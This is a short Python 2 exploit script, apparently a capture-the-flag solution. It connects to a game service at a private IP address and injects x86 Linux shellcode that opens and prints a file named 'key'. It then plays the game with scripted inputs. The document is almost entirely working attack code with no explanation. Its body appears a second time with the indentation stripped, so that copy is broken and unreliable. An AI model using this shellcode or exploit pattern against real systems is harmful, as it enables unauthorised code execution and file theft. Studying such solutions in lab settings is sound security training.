potetisensei/solve.py

## solve.py
from socket import *

shellcode = '\xeb)j\x05X[1\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf91\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2j\x04X\x8a\\$\x04\xcd\x80j\x01XC\xcd\x80\xe8\xd2\xff\xff\xffkey'
codes = '85\nH\nS\n95\nS\n125\nH\n17\nS\n109\nS\n125\nH\nH\nH\n57\nH\nH\n1\nH\nS\n1\nH\nH\nH\n25\nH\n-1'

t = socket(AF_INET, SOCK_STREAM)
t.connect(("192.168.174.187", 6789))

print t.recv(2048)
t.sendall("0\x00\x00\x00" + shellcode + "\n")
print t.recv(2048)
print t.recv(2048)

for i in codes.split("\n")[:-1]:
    t.sendall(i+"\n")
    print t.recv(2048)

cash = 40
print t.recv(2048)

dic = [ True, False, False, True, True, False, True, False, False, False, False, True, False, False, True, False, False, True, False, True, False, True, False, True, False, False, False, False, True, False, True, False, True, True, True, False, False, True, False, True, False, False, True, True, False, False, True, True, True, False, False, False, False, False, False, True, True, False, False, True, False, False, False, False, False, True, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, True, False]

for i in dic:
    if i:
        if 0x539 - cash <= 127:
            t.sendall(str(0x539-cash) + "\n")
            cash = 0x539
        elif cash < 127:
            t.sendall(str(cash)+"\n")
            cash *= 2
        else :
            t.sendall("127\n")
            cash += 127
    else :
        t.sendall("0\n")

    t.sendall("S\n")
    print t.recv(2048)

    if cash == 0x539:
        break

t.sendall("-1\n")
print t.recv(2048)
print t.recv(2048)
	from socket import *

	shellcode = '\xeb)j\x05X[1\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf91\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2j\x04X\x8a\\$\x04\xcd\x80j\x01XC\xcd\x80\xe8\xd2\xff\xff\xffkey'
	codes = '85\nH\nS\n95\nS\n125\nH\n17\nS\n109\nS\n125\nH\nH\nH\n57\nH\nH\n1\nH\nS\n1\nH\nH\nH\n25\nH\n-1'

	t = socket(AF_INET, SOCK_STREAM)
	t.connect(("192.168.174.187", 6789))

	print t.recv(2048)
	t.sendall("0\x00\x00\x00" + shellcode + "\n")
	print t.recv(2048)
	print t.recv(2048)

	for i in codes.split("\n")[:-1]:
	t.sendall(i+"\n")
	print t.recv(2048)

	cash = 40
	print t.recv(2048)

	dic = [ True, False, False, True, True, False, True, False, False, False, False, True, False, False, True, False, False, True, False, True, False, True, False, True, False, False, False, False, True, False, True, False, True, True, True, False, False, True, False, True, False, False, True, True, False, False, True, True, True, False, False, False, False, False, False, True, True, False, False, True, False, False, False, False, False, True, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, True, False]

	for i in dic:
	if i:
	if 0x539 - cash <= 127:
	t.sendall(str(0x539-cash) + "\n")
	cash = 0x539
	elif cash < 127:
	t.sendall(str(cash)+"\n")
	cash *= 2
	else :
	t.sendall("127\n")
	cash += 127
	else :
	t.sendall("0\n")

	t.sendall("S\n")
	print t.recv(2048)

	if cash == 0x539:
	break

	t.sendall("-1\n")
	print t.recv(2048)
	print t.recv(2048)